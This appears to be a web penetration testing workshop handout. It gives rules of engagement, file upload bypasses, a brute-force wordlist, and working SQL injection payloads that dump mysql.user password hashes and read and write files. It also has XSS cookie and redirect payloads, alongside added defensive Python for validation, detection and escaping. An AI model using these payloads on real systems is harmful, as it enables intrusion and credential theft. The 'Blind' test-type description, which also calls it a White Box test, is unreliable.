edli@scan-associates.net
We will focus on the Low Hanging Fruit concept: PHP / Perl programming, open source based web application penetration testing.
Blind
The Analyst engages the target with limited knowledge of its defenses and assets and full knowledge of channels. The target is notified in advance of the scope and time frame of the audit but not the channels tested or the test vectors. A double gray box audit tests the skills of the Analyst and the target's preparedness to unknown variables of agitation. The breadth and depth depends upon the quality of the information provided to the Analyst and the target before the test as well as the Analyst's applicable knowledge. This is also known as a White Box test.
Tandem
The Analyst and the target are prepared for the audit, both knowing in advance all the details of the audit. A tandem audit tests the protection and controls of the target. However, it cannot test the preparedness of the target to unknown variables of agitation. The true nature of the test is thoroughness as the Analyst does have full view of all tests and their responses. The breadth and depth depends upon the quality of the information provided to the Analyst before the test (transparency) as well as the Analyst's applicable knowledge. This is often known as an In-House Audit or a Crystal Box test and the Analyst is often part of the security process.
Reversal
9. Contracts should limit liability to the cost of the job, unless malicious activity has been proven.
10. Contracts must clearly explain the limits and dangers of the security test as part of the statement of work.
11. In the case of remote testing, the contract must include the origin of the Analysts by address, telephone number or IP address.
12. The client must provide a signed statement which provides testing permission exempting the Analysts from trespass within the scope, and damages liability to the cost of the audit service with the exception where malicious activity has been proven.
14. The contract must include clear, specific permissions for tests involving survivability failures, denial of service, process testing, and social engineering.
15. Contracts must contain the process for future contract and statement of work (SOW) changes.
18. The audit must clearly explain the limits of any security tests according to the scope.
Test Plan
19. The test plan may not contain plans, processes, techniques, or procedures which are outside the area of expertise or competence level of the Analyst.
Test Process
20. The Analyst must respect and maintain the safety, health, welfare, and privacy of the public both within and outside the scope.
21. The Analyst must always operate within the law of the physical location(s) of the targets in addition to rules or laws governing the Analyst's test location.
22. To prevent temporary raises in security for the duration of the test, only notify key people about the testing. It is the client's judgment which discerns who the key people are; however, it is assumed that they will be information and policy gatekeepers, managers of security processes, incident response personnel, and security operations staff.
23. If necessary for privileged testing, the client must provide two, separate, access tokens whether they be passwords, certificates, secure ID numbers, badges, etc. and they should be typical to the users of the privileges being tested rather than especially empty or secure accesses.
24. When testing includes known privileges, the Analyst must first test without privileges (such as in a black box environment) prior to testing again with privileges.
25. The Analysts are required to know their tools, where the tools came from, how the tools work, and have them tested in a restricted test area before using the tools on the client organization.
26. The conduct of tests which are explicitly meant to test the denial of a service or process or survivability may only be done with explicit permission and only to the scope where no damage is done outside of the scope or the community in which the scope resides.
30. The Analyst may not leave the scope in a position of less actual security than it was when provided.
Reporting
31. The Analyst must respect the privacy of all individuals and maintain their privacy for all results.
33. The Analyst may not sign test results and audit reports in which they were not directly involved.
34. Reports must remain objective and without untruths or any personally directed malice.
List View
Tree View
Tick "Be recursive" and change the file extension to html.
An interesting file was found.
Unrestricted File Upload Vulnerability
Case 1
http://localhost/upload/upload1/lampiran.html
Success!
Task 1
Objective : Brute-forcing directories with our list
1. Using DirBuster to locate our uploaded file
2. Add these directories to your file mylist.txt :
uplodfile
uploadfail
file
uplot
tempatfail
tempatrujukanpersuratan
Review our code!
Case 2
http://localhost/upload/upload2/lampiran.html
Cannot upload the file.
We will use the Tamper Data technique. What we need is Tamper Data or Burp Suite.
To use it:
Set the web browser proxy to localhost / 127.0.0.1
Set the port to 8080
Burp Suite GUI
Make sure Intercept is on
Change the Content-Type to image/jpeg
Click Forward
Ho-Yeay!
Review our code!
Case 3
http://localhost/upload/upload3/lampiran.html
Not allowed? Then we should modify our file extension.
Well done!
Review our code!
Task 2
Objective : Upload malicious php file and execute the file with php extension
Hint : Upload a file with *no* extension. The server will read our php file as if it were an image file.
Our code!
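The three cases above each defeat one weak check: a guessable upload path (Case 1), trusting the client's Content-Type header (Case 2), an extension blocklist (Case 3), and the no-extension trick in Task 2. The following upload validator is an added example written for this page, not the workshop's own upload code; the allowlist, the magic-byte table and the storage-name scheme are assumptions for the example. It decides on the file body and an extension allowlist, ignores Content-Type entirely, refuses extensionless names, and stores accepted files under a random server-chosen name so the stored path cannot be brute-forced.

```python
import os
import secrets

# Allowlist of extensions this hypothetical handler accepts (assumption for the example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each allowed format. The file body is checked against these;
# the client-supplied Content-Type header plays no part in the decision.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def extension_of(filename):
    """Lower-cased final extension of the uploaded name, '' when there is none
    (a bare 'lampiran' or a dotfile such as '.htaccess' both yield '')."""
    _, ext = os.path.splitext(os.path.basename(filename))
    return ext.lstrip(".").lower()


def validate_upload(filename, content_type, data):
    """Decide whether an upload is accepted. Returns (accepted, reason).

    content_type is taken as a parameter only to make the point that it is
    ignored: Case 2 shows a proxy can set it to image/jpeg for any file.
    """
    ext = extension_of(filename)
    if ext == "":
        # Task 2: a file with no extension must not be stored as-is.
        return False, "missing extension"
    if ext not in ALLOWED_EXTENSIONS:
        # Allowlist, not blocklist: Case 3 bypasses a blocklist by renaming.
        return False, "extension not allowed: " + ext
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        return False, "body does not match " + ext + " signature"
    return True, "ok"


def storage_name(ext):
    """Server-chosen name for an accepted upload: random, single extension.
    The original name is discarded, so the stored path cannot be guessed the
    way lampiran.html was located with DirBuster in Case 1."""
    return secrets.token_hex(16) + "." + ext
```

The handler should also write accepted files outside the web root or into a directory where script execution is disabled; the validator alone only stops the three bypasses shown above.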
Brute force at HTTP Basic Authentication
Simple HTTP Authentication Bruteforcer using Perl
Create two dictionary files. Save them as user.txt and pass.txt
admin
administrator
password
passwd
123
1234
12345
root
test
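A Basic Authentication brute-force run such as the one described above leaves a very recognisable trace in the web server's access log: a burst of 401 responses from one source address, often followed by a 200 once a guess lands. The detector below is an added example for this page (not the workshop's Perl script, and not a tool the page mentions); it parses Apache combined-format lines, applies a sliding window per source IP, and reports whether a success followed the failures. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines (Apache combined format) for this example: one client
# hammers a Basic-Auth protected path and finally gets a 200, another mistypes once.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2013:13:55:01 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "libwww-perl/6.05"
10.0.0.5 - - [10/Oct/2013:13:55:01 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "libwww-perl/6.05"
10.0.0.5 - - [10/Oct/2013:13:55:02 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "libwww-perl/6.05"
10.0.0.5 - - [10/Oct/2013:13:55:02 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "libwww-perl/6.05"
10.0.0.5 - - [10/Oct/2013:13:55:03 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "libwww-perl/6.05"
10.0.0.5 - admin [10/Oct/2013:13:55:03 +0800] "GET /admin/ HTTP/1.1" 200 2048 "-" "libwww-perl/6.05"
10.0.0.9 - - [10/Oct/2013:13:56:10 +0800] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.9 - alice [10/Oct/2013:13:56:30 +0800] "GET /admin/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, status) for a combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(m.group("status"))


def detect_basic_auth_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold 401 responses inside any sliding window
    of window_seconds. Each alert also records whether the same IP later got a
    200, i.e. whether the guessing may have succeeded."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, status = parsed
        if status == 401:
            failures[ip].append(ts)
        elif status == 200:
            successes[ip].append(ts)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, times in failures.items():
        times.sort()
        start, best, best_end = 0, 0, None
        for end, t in enumerate(times):
            # Slide the window start forward until it fits within window_seconds.
            while t - times[start] > window:
                start += 1
            if end - start + 1 > best:
                best, best_end = end - start + 1, t
        if best >= threshold:
            alerts.append({
                "ip": ip,
                "failures": best,
                "last_failure": best_end.isoformat(),
                "followed_by_success": any(s >= best_end for s in successes[ip]),
            })
    return alerts
```

Thresholds are a tuning choice: five failures in a minute is far below what a dictionary run produces but above what a user mistyping a password generates. The `followed_by_success` flag is what turns a noisy alert into an incident.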
By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with dot-dot-slash (../) sequences and its variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files, limited by system operational access control.
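The defence against the dot-dot-slash manipulation just described is not to strip `../` from the input but to resolve the requested name against the intended base directory and verify that the result is still inside it. The function below is an added example for this page (not code from the workshop); the base directory `/srv/www/files` used in its checks is a hypothetical path. It decodes the request once, rejects NUL bytes, treats backslashes as separators, and refuses anything that normalises to a location outside the base.

```python
from pathlib import Path
from urllib.parse import unquote


def resolve_under_base(base_dir, requested):
    """Map a user-supplied file reference onto a path inside base_dir.

    Returns the absolute path as a string, or None when the request would leave
    base_dir (../ sequences, URL-encoded variants, backslashes, absolute paths)
    or carries a NUL byte.
    """
    # Decode once, as the web server would; never decode repeatedly.
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # Treat backslashes like slashes and drop any leading separator so an
    # absolute request cannot replace the base.
    relative = decoded.replace("\\", "/").lstrip("/")
    base = Path(base_dir).resolve()
    candidate = (base / relative).resolve()
    # The only check that matters: after normalisation, is it still under base?
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return str(candidate)


def is_safe_request(base_dir, requested):
    """Convenience wrapper returning True when the request stays inside base_dir."""
    return resolve_under_base(base_dir, requested) is not None
```

Because the check runs on the fully resolved path, variants such as `....//`, URL-encoded dots or mixed separators are all handled by the same comparison rather than by a growing list of patterns.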
The primary form of SQL injection consists of direct insertion of code into parameters that are concatenated with SQL commands and executed.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
We will focus on SQL Injection vulnerability :
Requirement :
XAMPP server
Damn Vulnerable Web Application
Basic SQL commands
Login into DVWA (admin | password)
Inside DVWA
Input 1,2,3,4,5
Input alphabetics
Input any string with a single quote
The webpage produced SQL error
SQL Bypass Login
Try this :
1 or 1=1-- 
1 or 1=1#
or 1=1-- 
or 1=1#
%' or 1=1
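The login bypass works only because the application builds the statement by concatenation, exactly as the SQL injection paragraph above describes. The following added example (written for this page, not DVWA's own code) puts the vulnerable lookup beside the parameterised one and runs the page's own probes against both: the single-quote probe that produces the SQL error, and the `1=1` comment payload. It uses an in-memory SQLite table as a constructed stand-in for the users table, which is why the comment form `-- ` is used instead of MySQL's `#`.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the DVWA users table (assumption for the example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Concatenates the input into the statement, so quotes, OR and comments in
    the input become SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Binds the input as a parameter: whatever it contains, it is compared as a
    value and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def raises_sql_error(lookup, conn, user_id):
    """The page's first probe: does a stray single quote break the statement?"""
    try:
        lookup(conn, user_id)
        return False
    except sqlite3.Error:
        return True
```

The same contrast holds in PHP with `mysqli` or PDO prepared statements: the bypass payload stops matching anything, and the error-message probe that gives the injection away in the first place no longer fires.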
Order By
To find the number of columns:
int i = 1;
for (i = 1; the page shows no error; i++) {
    ' order by i#      // order by 1#, order by 2#, ...
}
Increment each number until we see an error on the page.
Using UNION ALL SELECT to union our own values into the result:
' union all select 1,version(),database(),4,5,6#
MySQL cheat sheet
Description : SQL command
version : version()
current user : user(), system_user()
hostname : @@hostname
location of data : @@datadir
Try certain commands which are quite interesting.
LIKE
' union all select 1,table_name,3,4,5,6 from information_schema.tables where table_name like 'user%'#
Enumerating the list of table names using SQL commands with the SQL injection technique
union all select 1,table_name,3,4,5,6 from information_schema.tables#
' union all select 1,table_schema,3,4,5,6 from information_schema.tables#
SQL function : concatenate
The MySQL CONCAT function is used to concatenate two strings to form a single string.
' union all select 1,concat(table_schema,0x3a,table_name),3,4,5,6 from information_schema.tables#
SQL clause : WHERE
www.md5decryptor.co.uk
Cracking tools: John the Ripper, hashcat (GPU based cracker)
Any other alternatives for post-exploitation?
Check database privileges: grantee, privilege_type, is_grantable
' union all select 1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable),3,4,5,6 from information_schema.user_privileges#
' union all select 1,concat(user,0x3a,password),3,4,5,6 from mysql.user#
Crack it using online crack site
Login into phpMyAdmin (if any)
Successfully login with root account
' union all select 1,load_file('C:\\xampp\\htdocs\\pentest.php'),3,4,5,6#
' union all select 1,load_file('C:\\xampp\\htdocs\\upload\\upload2\\uploadfile\\.htaccess'),3,4,5,6#
' union all select 1,load_file('C:\\xampp\\php\\php.ini'),3,4,5,6#
' union all select 1,'test',3,4,5,6 into outfile 'test.txt'#
Task 3
Create a new PHP file (test.php) using SQL syntax of INTO OUTFILE
Output : Output our file with the full path together with our code (input)
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
[Reference : OWASP]
Reflected XSS Attacks
Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.
Output on the page and source-page
Simple checks for XSS using the JavaScript tag <script>
Reflected XSS
Input : <script>alert('PENTEST')</script>
Reflected XSS
Input : <h1><font color="#00FF00">Alienware</font></h1>
Stored XSS Attacks
The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it's possible to create a specific JavaScript code that will send the cookie to the attacker.
[Reference : OWASP]
Inject using script below
Input : <script>alert(document.cookie)</script>
Inject using script below
Input : <script>document.location='http://www.google.com.my';</script>
Redirected
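Every payload in the reflected and stored XSS sections above relies on the application echoing input into HTML without encoding it, and the cookie-theft variant additionally relies on the session cookie being readable from `document.cookie`. The code below is an added example for this page (not DVWA's or the workshop's code) and uses a hypothetical search page as the echo point. It renders the page both ways, turns the "simple check" into a classifier that tells a raw reflection from an encoded one, and shows the Set-Cookie flags that keep the session id out of reach of the stored payload.

```python
import html


def render_search_page(query, escape=True):
    """Build a search page that echoes the query in element content and in an
    attribute value. escape=False reproduces the vulnerable behaviour the
    payloads above exploit; the default applies HTML entity encoding."""
    shown = html.escape(query, quote=True) if escape else query
    return (
        "<h1>Search</h1>\n"
        "<p>You searched for: " + shown + "</p>\n"
        '<input type="text" name="q" value="' + shown + '">\n'
    )


def classify_reflection(payload, body):
    """The 'simple check' from the page, made precise: 'raw' if the payload is
    echoed with its tags intact, 'escaped' if only its entity-encoded form
    appears, 'absent' otherwise."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def session_cookie_header(session_id):
    """Set-Cookie line that keeps the session id out of document.cookie
    (HttpOnly) and off plaintext channels (Secure), limiting what the stored
    XSS payload above could read. The cookie name follows PHP's default."""
    return "Set-Cookie: PHPSESSID=" + session_id + "; HttpOnly; Secure; SameSite=Lax; Path=/"
```

`html.escape(..., quote=True)` encodes `<`, `>`, `&`, `"` and `'`, which covers both the text-node position and the double-quoted attribute used here; output landing inside a script block or a URL needs the encoding rules of that context instead.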